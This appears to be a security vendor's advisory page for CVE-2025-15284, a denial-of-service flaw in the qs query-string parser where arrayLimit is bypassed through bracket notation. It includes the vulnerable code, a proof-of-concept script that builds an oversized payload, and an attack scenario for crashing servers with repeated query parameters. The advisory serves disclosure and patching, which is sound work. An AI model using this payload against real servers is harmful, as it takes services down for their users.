Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2025-15284

Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: < 6.14.1.SummaryThe arrayLimit option in qs does not enforce limits for bracket notation (a[]=1...
Back to all
CVE

CVE-2025-15284

Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: < 6.14.1.SummaryThe arrayLimit option in qs does not enforce limits for bracket notation (a[]=1...

Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: < 6.14.1.

SummaryThe arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

DetailsThe arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {

    obj = utils.combine([], leaf);  // No arrayLimit check

}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here

    obj = [];

    obj[index] = leaf;

}

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoCTest 1 - Basic bypass:

npm install qs

const qs = require('qs');

const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });

console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');

const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');

const result = qs.parse(attack, { arrayLimit: 100 });

console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

  •  arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
  •  Use bracket notation: a[]=value (not indexed a[0]=value)

ImpactDenial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

  •  Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
  •  Application parses with qs.parse(query, { arrayLimit: 100 })
  •  qs ignores limit, parses all 100,000 elements into array
  •  Server memory exhausted → application crashes or becomes unresponsive
  •  Service unavailable for all users

Real-world impact:

  •  Single malicious request can crash server
  •  No authentication required
  •  Easy to automate and scale
  •  Affects any endpoint parsing query strings with bracket notation

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
8.7
-
4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
C
H
U
0
-
C
H
U
-

Related Resources

No items found.

References

https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p, https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9

Severity

0

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
0
EPSS Probability
0.00152%
EPSS Percentile
0.36189%
Introduced Version
0
Fix Available
3086902ecf7f088d0d1803887643ac6c03d415b9

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading